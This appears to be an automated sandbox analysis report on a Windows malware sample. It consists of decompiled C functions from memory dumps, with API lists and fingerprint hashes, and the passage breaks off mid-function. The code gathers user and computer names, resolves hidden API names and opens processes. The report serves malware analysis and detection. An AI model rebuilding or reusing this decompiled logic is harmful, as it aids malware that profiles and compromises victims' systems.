            				intOrPtr* _t102;
            				signed int _t103;
            				void* _t104;
            				intOrPtr _t105;
            				void* _t107;
            				intOrPtr* _t115;
            				void* _t119;
            				intOrPtr _t125;
            
            				_t58 =  *0x47ea3dc; // 0x5429ca8
            				_v24 = _t58;
            				_v28 = 8;
            				_v20 = GetTickCount();
            				_t60 = E047E6ABD();
            				_t103 = 5;
            				_t98 = _t60 % _t103 + 6;
            				_t62 = E047E6ABD();
            				_t117 = _t62 % _t103 + 6;
            				_v32 = _t62 % _t103 + 6;
            				_t64 = E047E42E9(_t60 % _t103 + 6);
            				_v16 = _t64;
            				if(_t64 != 0) {
            					_t66 = E047E42E9(_t117);
            					_v12 = _t66;
            					if(_t66 != 0) {
            						_push(5);
            						_t104 = 0xa;
            						_t119 = E047E398D(_t104,  &_v20);
            						if(_t119 == 0) {
            							_t119 = 0x47e918c;
            						}
            						_t70 = E047E5FA1(_v24);
            						_v8 = _t70;
            						if(_t70 != 0) {
            							_t115 = __imp__;
            							_t72 =  *_t115(_t119);
            							_t75 =  *_t115(_v8);
            							_t76 =  *_t115(_a4);
            							_t80 = E047E33DC(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
            							_v24 = _t80;
            							if(_t80 != 0) {
            								_t105 =  *0x47ea348; // 0xc3d5a8
            								_t102 =  *0x47ea138; // 0x47e7ddd
            								_t28 = _t105 + 0x47ebd10; // 0x530025
            								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
            								_push(4);
            								_t107 = 5;
            								_t83 = E047E398D(_t107,  &_v20);
            								_a8 = _t83;
            								if(_t83 == 0) {
            									_a8 = 0x47e9190;
            								}
            								_t84 =  *_t115(_a8);
            								_t85 =  *_t115(_v8);
            								_t86 =  *_t115(_a4);
            								_t125 = E047E33DC(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
            								if(_t125 == 0) {
            									E047E61DA(_v24);
            								} else {
            									_t92 =  *0x47ea348; // 0xc3d5a8
            									_t44 = _t92 + 0x47eba20; // 0x73006d
            									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
            									 *_a16 = _v24;
            									_v28 = _v28 & 0x00000000;
            									 *_a20 = _t125;
            								}
            							}
            							E047E61DA(_v8);
            						}
            						E047E61DA(_v12);
            					}
            					E047E61DA(_v16);
            				}
            				return _v28;
            			}

            APIs
            • GetTickCount.KERNEL32 ref: 047E7250
            • lstrlen.KERNEL32(00000000,00000005), ref: 047E72D1
            • lstrlen.KERNEL32(?), ref: 047E72E2
            • lstrlen.KERNEL32(00000000), ref: 047E72E9
            • lstrlenW.KERNEL32(80000002), ref: 047E72F0
            • lstrlen.KERNEL32(?,00000004), ref: 047E7359
            • lstrlen.KERNEL32(?), ref: 047E7362
            • lstrlen.KERNEL32(?), ref: 047E7369
            • lstrlenW.KERNEL32(?), ref: 047E7370
              • Part of subcall function 047E61DA: RtlFreeHeap.NTDLL(00000000,00000000,047E6383,00000000,?,00000000,00000000), ref: 047E61E6
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: lstrlen$CountFreeHeapTick
            • String ID:
            • API String ID: 2535036572-0
            • Opcode ID: e80bec0363692fd2f500eb56d9b0648d7ef5b0040af2c4e39f335f8cf57d4dea
            • Instruction ID: 0e09e0a169d7d5512d3e5ca910c21e8077498525116e11e41b9bf9b378a643e4
            • Opcode Fuzzy Hash: e80bec0363692fd2f500eb56d9b0648d7ef5b0040af2c4e39f335f8cf57d4dea
            • Instruction Fuzzy Hash: AF516472D00119ABDF12AFA6DC48DEE7BB5EF48318F058125EE04AB310D735EA11DB94
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E047E1340() {
            				long _v8;
            				long _v12;
            				int _v16;
            				long _t39;
            				long _t43;
            				signed int _t47;
            				short _t51;
            				signed int _t52;
            				int _t56;
            				int _t57;
            				char* _t64;
            				short* _t67;
            
            				_v16 = 0;
            				_v8 = 0;
            				GetUserNameW(0,  &_v8);
            				_t39 = _v8;
            				if(_t39 != 0) {
            					_v12 = _t39;
            					_v8 = 0;
            					GetComputerNameW(0,  &_v8);
            					_t43 = _v8;
            					if(_t43 != 0) {
            						_t11 = _t43 + 2; // 0x76b5c742
            						_v12 = _v12 + _t11;
            						_t64 = E047E33DC(_v12 + _t11 << 2);
            						if(_t64 != 0) {
            							_t47 = _v12;
            							_t67 = _t64 + _t47 * 2;
            							_v8 = _t47;
            							if(GetUserNameW(_t67,  &_v8) == 0) {
            								L7:
            								E047E61DA(_t64);
            							} else {
            								_t51 = 0x40;
            								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
            								_t52 = _v8;
            								_v12 = _v12 - _t52;
            								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
            									goto L7;
            								} else {
            									_t56 = _v12 + _v8;
            									_t31 = _t56 + 2; // 0x47e3e01
            									_v12 = _t56;
            									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
            									_v8 = _t57;
            									if(_t57 == 0) {
            										goto L7;
            									} else {
            										_t64[_t57] = 0;
            										_v16 = _t64;
            									}
            								}
            							}
            						}
            					}
            				}
            				return _v16;
            			}

            APIs
            • GetUserNameW.ADVAPI32(00000000,047E3DFF), ref: 047E1354
            • GetComputerNameW.KERNEL32(00000000,047E3DFF), ref: 047E1370
              • Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8
            • GetUserNameW.ADVAPI32(00000000,047E3DFF), ref: 047E13AA
            • GetComputerNameW.KERNEL32(047E3DFF,76B5C740), ref: 047E13CD
            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,047E3DFF,00000000,047E3E01,00000000,00000000,?,76B5C740,047E3DFF), ref: 047E13F0
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
            • String ID: @het
            • API String ID: 3850880919-3010869118
            • Opcode ID: e88a2e8ba4d390cf6571d1043efbd1e1b35583233cf1fac6d5a9809c24931ef7
            • Instruction ID: 17df68f5571225e6dc3d45f1f95cb3f4cf2d2500582515699c767840155e7fc0
            • Opcode Fuzzy Hash: e88a2e8ba4d390cf6571d1043efbd1e1b35583233cf1fac6d5a9809c24931ef7
            • Instruction Fuzzy Hash: D321F8B6900108FFDB11DFE6C9858EEBBB8EF48304B5045AAE501E7240DB34AB45DB60
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E047E54D8(intOrPtr _a4) {
            				void* _t2;
            				unsigned int _t4;
            				void* _t5;
            				long _t6;
            				void* _t7;
            				void* _t15;
            
            				_t2 = CreateEventA(0, 1, 0, 0);
            				 *0x47ea30c = _t2;
            				if(_t2 == 0) {
            					return GetLastError();
            				}
            				_t4 = GetVersion();
            				if(_t4 != 5) {
            					L4:
            					if(_t15 <= 0) {
            						_t5 = 0x32;
            						return _t5;
            					}
            					L5:
            					 *0x47ea2fc = _t4;
            					_t6 = GetCurrentProcessId();
            					 *0x47ea2f8 = _t6;
            					 *0x47ea304 = _a4;
            					_t7 = OpenProcess(0x10047a, 0, _t6);
            					 *0x47ea2f4 = _t7;
            					if(_t7 == 0) {
            						 *0x47ea2f4 =  *0x47ea2f4 | 0xffffffff;
            					}
            					return 0;
            				}
            				if(_t4 >> 8 > 0) {
            					goto L5;
            				}
            				_t15 = _t4 - _t4;
            				goto L4;
            			}

            APIs
            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,047E5037,?), ref: 047E54E0
            • GetVersion.KERNEL32 ref: 047E54EF
            • GetCurrentProcessId.KERNEL32 ref: 047E550B
            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 047E5528
            • GetLastError.KERNEL32 ref: 047E5547
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
            • String ID: @MetNet
            • API String ID: 2270775618-2109406137
            • Opcode ID: 307326dcb48ece887454c841670ec425793a61845db9da514893cf2a208f6929
            • Instruction ID: 978bfaee379e97490858d48cca84e4f1f2218be8e2b326a7f662dbfcd9e81293
            • Opcode Fuzzy Hash: 307326dcb48ece887454c841670ec425793a61845db9da514893cf2a208f6929
            • Instruction Fuzzy Hash: 3EF081F4640307ABD7208B63A919BA43B67E74C759F508B19E613EE2C0E6789880CB15
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SysAllocString.OLEAUT32(00000000), ref: 047E3ABD
            • SysAllocString.OLEAUT32(0070006F), ref: 047E3AD1
            • SysAllocString.OLEAUT32(00000000), ref: 047E3AE3
            • SysFreeString.OLEAUT32(00000000), ref: 047E3B4B
            • SysFreeString.OLEAUT32(00000000), ref: 047E3B5A
            • SysFreeString.OLEAUT32(00000000), ref: 047E3B65
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: String$AllocFree
            • String ID:
            • API String ID: 344208780-0
            • Opcode ID: 29d382f5541011d12fc126e8f6037eaeb307dc6885f17f31520145e447f98c3b
            • Instruction ID: a53e816fbf38574f3a356ca047e142b117b62dcaa9ce21b1a4ec5c7aa57d8b81
            • Opcode Fuzzy Hash: 29d382f5541011d12fc126e8f6037eaeb307dc6885f17f31520145e447f98c3b
            • Instruction Fuzzy Hash: C1419176D00609ABDF01DFBDC844AAEB7BAEF49300F108526EE11EB210DA71ED05CB91
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E047E6BF9(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
            				intOrPtr _v8;
            				intOrPtr _t23;
            				intOrPtr _t26;
            				_Unknown_base(*)()* _t28;
            				intOrPtr _t30;
            				_Unknown_base(*)()* _t32;
            				intOrPtr _t33;
            				_Unknown_base(*)()* _t35;
            				intOrPtr _t36;
            				_Unknown_base(*)()* _t38;
            				intOrPtr _t39;
            				_Unknown_base(*)()* _t41;
            				intOrPtr _t44;
            				struct HINSTANCE__* _t48;
            				intOrPtr _t54;
            
            				_t54 = E047E33DC(0x20);
            				if(_t54 == 0) {
            					_v8 = 8;
            				} else {
            					_t23 =  *0x47ea348; // 0xc3d5a8
            					_t1 = _t23 + 0x47eb436; // 0x4c44544e
            					_t48 = GetModuleHandleA(_t1);
            					_t26 =  *0x47ea348; // 0xc3d5a8
            					_t2 = _t26 + 0x47eb85c; // 0x7243775a
            					_v8 = 0x7f;
            					_t28 = GetProcAddress(_t48, _t2);
            					 *(_t54 + 0xc) = _t28;
            					if(_t28 == 0) {
            						L8:
            						E047E61DA(_t54);
            					} else {
            						_t30 =  *0x47ea348; // 0xc3d5a8
            						_t5 = _t30 + 0x47eb849; // 0x614d775a
            						_t32 = GetProcAddress(_t48, _t5);
            						 *(_t54 + 0x10) = _t32;
            						if(_t32 == 0) {
            							goto L8;
            						} else {
            							_t33 =  *0x47ea348; // 0xc3d5a8
            							_t7 = _t33 + 0x47eb72b; // 0x6e55775a
            							_t35 = GetProcAddress(_t48, _t7);
            							 *(_t54 + 0x14) = _t35;
            							if(_t35 == 0) {
            								goto L8;
            							} else {
            								_t36 =  *0x47ea348; // 0xc3d5a8
            								_t9 = _t36 + 0x47eb883; // 0x4e6c7452
            								_t38 = GetProcAddress(_t48, _t9);
            								 *(_t54 + 0x18) = _t38;
            								if(_t38 == 0) {
            									goto L8;
            								} else {
            									_t39 =  *0x47ea348; // 0xc3d5a8
            									_t11 = _t39 + 0x47eb87b; // 0x6c43775a
            									_t41 = GetProcAddress(_t48, _t11);
            									 *(_t54 + 0x1c) = _t41;
            									if(_t41 == 0) {
            										goto L8;
            									} else {
            										 *((intOrPtr*)(_t54 + 4)) = _a4;
            										 *((intOrPtr*)(_t54 + 8)) = 0x40;
            										_t44 = E047E7A08(_t54, _a8);
            										_v8 = _t44;
            										if(_t44 != 0) {
            											goto L8;
            										} else {
            											 *_a12 = _t54;
            										}
            									}
            								}
            							}
            						}
            					}
            				}
            				return _v8;
            			}

            APIs
              • Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8
            • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,047E37FB,?,?,?,?,00000000,00000000), ref: 047E6C1E
            • GetProcAddress.KERNEL32(00000000,7243775A), ref: 047E6C40
            • GetProcAddress.KERNEL32(00000000,614D775A), ref: 047E6C56
            • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 047E6C6C
            • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 047E6C82
            • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 047E6C98
              • Part of subcall function 047E7A08: memset.NTDLL ref: 047E7A87
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: AddressProc$AllocateHandleHeapModulememset
            • String ID:
            • API String ID: 1886625739-0
            • Opcode ID: 4af6684de9e92fb81e62661c58900d6f09ed846ffb5dc2e77a89b98bacccffcf
            • Instruction ID: b6cea81d8a52ee16158aeaca3f0a766a1a2748900f849960973526ae5ffbd698
            • Opcode Fuzzy Hash: 4af6684de9e92fb81e62661c58900d6f09ed846ffb5dc2e77a89b98bacccffcf
            • Instruction Fuzzy Hash: 9F212DB160070AAFD720DF6BC944EAABBECEB1C2447408615E505CB721E778F908CB60
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 88%
            			E047E4C94(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
            				signed int _v8;
            				char _v12;
            				signed int* _v16;
            				char _v284;
            				void* __esi;
            				char* _t59;
            				intOrPtr* _t60;
            				intOrPtr _t64;
            				char _t65;
            				intOrPtr _t68;
            				intOrPtr _t69;
            				intOrPtr _t71;
            				void* _t73;
            				signed int _t81;
            				void* _t91;
            				void* _t92;
            				char _t98;
            				signed int* _t100;
            				intOrPtr* _t101;
            				void* _t102;
            
            				_t92 = __ecx;
            				_v8 = _v8 & 0x00000000;
            				_t98 = _a16;
            				if(_t98 == 0) {
            					__imp__( &_v284,  *0x47ea3dc);
            					_t91 = 0x80000002;
            					L6:
            					_t59 = E047E6536( &_v284,  &_v284);
            					_a8 = _t59;
            					if(_t59 == 0) {
            						_v8 = 8;
            						L29:
            						_t60 = _a20;
            						if(_t60 != 0) {
            							 *_t60 =  *_t60 + 1;
            						}
            						return _v8;
            					}
            					_t101 = _a24;
            					if(E047E313F(_t92, _t97, _t101, _t91, _t59) != 0) {
            						L27:
            						E047E61DA(_a8);
            						goto L29;
            					}
            					_t64 =  *0x47ea318; // 0x5429e00
            					_t16 = _t64 + 0xc; // 0x5429f22
            					_t65 = E047E6536(_t64,  *_t16);
            					_a24 = _t65;
            					if(_t65 == 0) {
            						L14:
            						_t29 = _t101 + 0x14; // 0x102
            						_t33 = _t101 + 0x10; // 0x3d047e90
            						if(E047E7767(_t97,  *_t33, _t91, _a8,  *0x47ea3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
            							_t68 =  *0x47ea348; // 0xc3d5a8
            							if(_t98 == 0) {
            								_t35 = _t68 + 0x47ebb5a; // 0x4d4c4b48
            								_t69 = _t35;
            							} else {
            								_t34 = _t68 + 0x47ebbac; // 0x55434b48
            								_t69 = _t34;
            							}
            							if(E047E7238(_t69,  *0x47ea3d4,  *0x47ea3d8,  &_a24,  &_a16) == 0) {
            								if(_t98 == 0) {
            									_t71 =  *0x47ea348; // 0xc3d5a8
            									_t44 = _t71 + 0x47eb332; // 0x74666f53
            									_t73 = E047E6536(_t44, _t44);
            									_t99 = _t73;
            									if(_t73 == 0) {
            										_v8 = 8;
            									} else {
            										_t47 = _t101 + 0x10; // 0x3d047e90
            										E047E5B0E( *_t47, _t91, _a8,  *0x47ea3d8, _a24);
            										_t49 = _t101 + 0x10; // 0x3d047e90
            										E047E5B0E( *_t49, _t91, _t99,  *0x47ea3d0, _a16);
            										E047E61DA(_t99);
            									}
            								} else {
            									_t40 = _t101 + 0x10; // 0x3d047e90
            									E047E5B0E( *_t40, _t91, _a8,  *0x47ea3d8, _a24);
            									_t43 = _t101 + 0x10; // 0x3d047e90
            									E047E5B0E( *_t43, _t91, _a8,  *0x47ea3d0, _a16);
            								}
            								if( *_t101 != 0) {
            									E047E61DA(_a24);
            								} else {
            									 *_t101 = _a16;
            								}
            							}
            						}
            						goto L27;
            					}
            					_t21 = _t101 + 0x10; // 0x3d047e90
            					_t81 = E047E58BD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
            					if(_t81 == 0) {
            						_t100 = _v16;
            						if(_v12 == 0x28) {
            							 *_t100 =  *_t100 & _t81;
            							_t26 = _t101 + 0x10; // 0x3d047e90
            							E047E7767(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
            						}
            						E047E61DA(_t100);
            						_t98 = _a16;
            					}
            					E047E61DA(_a24);
            					goto L14;
            				}
            				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
            					goto L29;
            				} else {
            					_t97 = _a8;
            					E047E7AB0(_t98, _a8,  &_v284);
            					__imp__(_t102 + _t98 - 0x117,  *0x47ea3dc);
            					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
            					_t91 = 0x80000003;
            					goto L6;
            				}
            			}

            APIs
            • StrChrA.SHLWAPI(047E6A76,0000005F,00000000,00000000,00000104), ref: 047E4CC7
            • lstrcpy.KERNEL32(?,?), ref: 047E4CF4
              • Part of subcall function 047E6536: lstrlen.KERNEL32(?,00000000,05429E00,00000000,047E6F0A,0542A023,43175AC3,?,?,?,?,43175AC3,00000005,047EA00C,4D283A53,?), ref: 047E653D
              • Part of subcall function 047E6536: mbstowcs.NTDLL ref: 047E6566
              • Part of subcall function 047E6536: memset.NTDLL ref: 047E6578
              • Part of subcall function 047E5B0E: lstrlenW.KERNEL32(?,?,?,047E4E5D,3D047E90,80000002,047E6A76,047E57D1,74666F53,4D4C4B48,047E57D1,?,3D047E90,80000002,047E6A76,?), ref: 047E5B33
              • Part of subcall function 047E61DA: RtlFreeHeap.NTDLL(00000000,00000000,047E6383,00000000,?,00000000,00000000), ref: 047E61E6
            • lstrcpy.KERNEL32(?,00000000), ref: 047E4D16
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
            • String ID: ($\
            • API String ID: 3924217599-1512714803
            • Opcode ID: 565af2424e3f25726c3a8f36c115c2519f5e56d2ec07e2086386c15d1d4777a4
            • Instruction ID: fd590b370950bb0d59b0c7792e3afc4beae65a433a478afb231f653c8a62eca3
            • Opcode Fuzzy Hash: 565af2424e3f25726c3a8f36c115c2519f5e56d2ec07e2086386c15d1d4777a4
            • Instruction Fuzzy Hash: 71512972100209FFDF129FA6DD44EFA7BBAEF0C358F008658FA1596260D735E925AB10
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 39%
            			E047E454F(void* __eax, void* __ecx) {
            				char _v8;
            				void* _v12;
            				intOrPtr _v16;
            				char _v20;
            				void* __esi;
            				intOrPtr _t36;
            				intOrPtr* _t37;
            				intOrPtr* _t39;
            				void* _t53;
            				long _t58;
            				void* _t59;
            
            				_t53 = __ecx;
            				_t59 = __eax;
            				_t58 = 0;
            				ResetEvent( *(__eax + 0x1c));
            				_push( &_v8);
            				_push(4);
            				_push( &_v20);
            				_push( *((intOrPtr*)(_t59 + 0x18)));
            				if( *0x47ea160() != 0) {
            					L5:
            					if(_v8 == 0) {
            						 *((intOrPtr*)(_t59 + 0x30)) = 0;
            						L21:
            						return _t58;
            					}
            					 *0x47ea174(0, 1,  &_v12);
            					if(0 != 0) {
            						_t58 = 8;
            						goto L21;
            					}
            					_t36 = E047E33DC(0x1000);
            					_v16 = _t36;
            					if(_t36 == 0) {
            						_t58 = 8;
            						L18:
            						_t37 = _v12;
            						 *((intOrPtr*)( *_t37 + 8))(_t37);
            						goto L21;
            					}
            					_push(0);
            					_push(_v8);
            					_push( &_v20);
            					while(1) {
            						_t39 = _v12;
            						_t56 =  *_t39;
            						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
            						ResetEvent( *(_t59 + 0x1c));
            						_push( &_v8);
            						_push(0x1000);
            						_push(_v16);
            						_push( *((intOrPtr*)(_t59 + 0x18)));
            						if( *0x47ea160() != 0) {
            							goto L13;
            						}
            						_t58 = GetLastError();
            						if(_t58 != 0x3e5) {
            							L15:
            							E047E61DA(_v16);
            							if(_t58 == 0) {
            								_t58 = E047E2B18(_v12, _t59);
            							}
            							goto L18;
            						}
            						_t58 = E047E16B2( *(_t59 + 0x1c), _t56, 0xffffffff);
            						if(_t58 != 0) {
            							goto L15;
            						}
            						_t58 =  *((intOrPtr*)(_t59 + 0x28));
            						if(_t58 != 0) {
            							goto L15;
            						}
            						L13:
            						_t58 = 0;
            						if(_v8 == 0) {
            							goto L15;
            						}
            						_push(0);
            						_push(_v8);
            						_push(_v16);
            					}
            				}
            				_t58 = GetLastError();
            				if(_t58 != 0x3e5) {
            					L4:
            					if(_t58 != 0) {
            						goto L21;
            					}
            					goto L5;
            				}
            				_t58 = E047E16B2( *(_t59 + 0x1c), _t53, 0xffffffff);
            				if(_t58 != 0) {
            					goto L21;
            				}
            				_t58 =  *((intOrPtr*)(_t59 + 0x28));
            				goto L4;
            			}

            APIs
            • ResetEvent.KERNEL32(?), ref: 047E4565
            • GetLastError.KERNEL32 ref: 047E457E
              • Part of subcall function 047E16B2: WaitForMultipleObjects.KERNEL32(00000002,047E7C47,00000000,047E7C47,?,?,?,047E7C47,0000EA60), ref: 047E16CD
            • ResetEvent.KERNEL32(?), ref: 047E45F7
            • GetLastError.KERNEL32 ref: 047E4612
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: ErrorEventLastReset$MultipleObjectsWait
            • String ID: @MetNet
            • API String ID: 2394032930-2109406137
            • Opcode ID: 34a50d33cd8611ec81591d12fa47fee36d969accc8c9a1333489be9525cb7179
            • Instruction ID: 8616bd8cef918f67b0d3fad546bfbb0c1b8b8d6ca419953b640002041dc80994
            • Opcode Fuzzy Hash: 34a50d33cd8611ec81591d12fa47fee36d969accc8c9a1333489be9525cb7179
            • Instruction Fuzzy Hash: 06319032A00604EBDB219FA7D848EBE77B9FF8C254F154768E551A7290EB30F9459B10
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 37%
            			E047E607C() {
            				void* _v0;
            				void** _t3;
            				void** _t5;
            				void** _t7;
            				void** _t8;
            				void* _t10;
            
            				_t3 =  *0x47ea3cc; // 0x5429600
            				__imp__( &(_t3[0x10]));
            				while(1) {
            					_t5 =  *0x47ea3cc; // 0x5429600
            					_t1 =  &(_t5[0x16]); // 0x0
            					if( *_t1 == 0) {
            						break;
            					}
            					Sleep(0xa);
            				}
            				_t7 =  *0x47ea3cc; // 0x5429600
            				_t10 =  *_t7;
            				if(_t10 != 0 && _t10 != 0x47eb142) {
            					HeapFree( *0x47ea2d8, 0, _t10);
            					_t7 =  *0x47ea3cc; // 0x5429600
            				}
            				 *_t7 = _v0;
            				_t8 =  &(_t7[0x10]);
            				__imp__(_t8);
            				return _t8;
            			}

            APIs
            • RtlEnterCriticalSection.NTDLL(054295C0), ref: 047E6085
            • Sleep.KERNEL32(0000000A), ref: 047E608F
            • HeapFree.KERNEL32(00000000), ref: 047E60BD
            • RtlLeaveCriticalSection.NTDLL(054295C0), ref: 047E60D2
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
            • String ID: Uet
            • API String ID: 58946197-2766386878
            • Opcode ID: 55f6060345c3e72e06d667e0611adf5cf488f01b38df5fa112f1e8e68cf9735b
            • Instruction ID: fff05d61309ea090e5b6e272e47fd6c31129501f0f00445911088dd6d0c19f4d
            • Opcode Fuzzy Hash: 55f6060345c3e72e06d667e0611adf5cf488f01b38df5fa112f1e8e68cf9735b
            • Instruction Fuzzy Hash: 32F0D4B52002029BE728CF57D849EA57BB5EB9C711B48CB18EA02DF391D638BC44DA25
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 85%
            			E047E35D2(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
            				void* _v8;
            				char _v48;
            				void* __edi;
            				intOrPtr _t22;
            				intOrPtr _t30;
            				intOrPtr _t34;
            				intOrPtr* _t42;
            				void* _t43;
            				void* _t46;
            				intOrPtr* _t48;
            				void* _t49;
            				intOrPtr _t51;
            
            				_t42 = _a16;
            				_t48 = __eax;
            				_t22 =  *0x47ea348; // 0xc3d5a8
            				_t2 = _t22 + 0x47eb7bb; // 0x657a6973
            				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
            				if( *0x47ea2ec >= 5) {
